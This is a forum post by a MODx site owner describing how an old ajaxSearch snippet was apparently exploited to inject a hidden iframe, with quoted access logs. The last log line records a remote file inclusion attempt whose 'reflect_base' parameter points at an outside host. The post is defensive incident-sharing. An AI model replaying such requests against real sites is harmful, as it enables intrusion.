I also had a site that was infected a few weeks ago (i.e. the document.parser.class.inc.php file was infected with the same base64 code and injecting a hidden iframe into pages).
I was able to trace the vulnerability to what I believe was an old version ajaxSearch, 1.8.1 (I have since found that the Modx team has warned that the older versions of this snippet are vulnerable).
I am pretty sure the attacker gained entry via the ajaxsearch snippet based on the log entries below.
I included the first three entries (at 1:21:55) because this might have been the probe that sent the notice back to the server that performed the attack (notice the request for the ajaxSearch_readme.txt file .. which may be used to determine the current version). The attack came about 20 minutes later. Notice the GET with the base64_js parameter. Also, I found that the ajaxSearch directory had a timestamp of 1:44 .. the exact time of these requests. (This was the only timestamp on the site that was different than the timestamp of the last set of uploads). It is likely that I am way off base here, but since removing ajaxSearch, and restoring the document parser I have not had any problems. Google has reviewed the site and removed the warning as well.
Also, the same as with everyone else, the document parser timestamp had not changed. I have since removed ajaxSearch from the site until I upgrade the to the latest version of Modx. (currently running 0.9.6.3, ajaxSearch 1.8.1). Mostly, I need to take the blame for this by not keeping current with the Modx security issues that have been clearly posted.
FYI, I am now seeing some suspicious requests to the reflect snippet. (see 2nd log entry) It appears an attacker my be attempting an exploit of some nature. If anyone has any insight into this and whether or not I should be worried, please let me know.
Hopefully this might help any others on one of the older versions of Modx and more specifically ajaxSearch.
Doug
heloop.netplan.co.uk - - [14/Jul/2010:01:21:52 -0400] "GET /assets/snippets/ajaxSearch/ajaxSearch_readme.txt HTTP/1.1" 200 24841 "-" "-"
theloop.netplan.co.uk - - [14/Jul/2010:01:21:55 -0400] "GET /assets/snippets/ajaxSearch/ajax_g.php HTTP/1.1" 200 21244 "-" "-"
theloop.netplan.co.uk - - [14/Jul/2010:01:21:55 -0400] "GET /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 28546 "-" "-"
212.62.110.20 - - [14/Jul/2010:01:43:55 -0400] "GET /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 28976 "http://nubar.co.uk/thumbs/thumb/modxall/google_links.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
212.62.110.20 - - [14/Jul/2010:01:44:07 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 200 2172 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
212.62.110.20 - - [14/Jul/2010:01:43:57 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 200 2172 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
212.62.110.20 - - [14/Jul/2010:01:44:06 -0400] "POST /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 29302 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
212.62.110.20 - - [14/Jul/2010:01:44:33 -0400] "POST /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 28751 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
212.62.110.20 - - [14/Jul/2010:01:44:34 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 404 6382 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
ea.f8.7bae.static.theplanet.com - - [08/Aug/2010:06:12:46 -0400] "GET /about//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.yptmtc.org/BU/bu/id? HTTP/1.1" 404 6206 "-" "libwww-perl/5.805"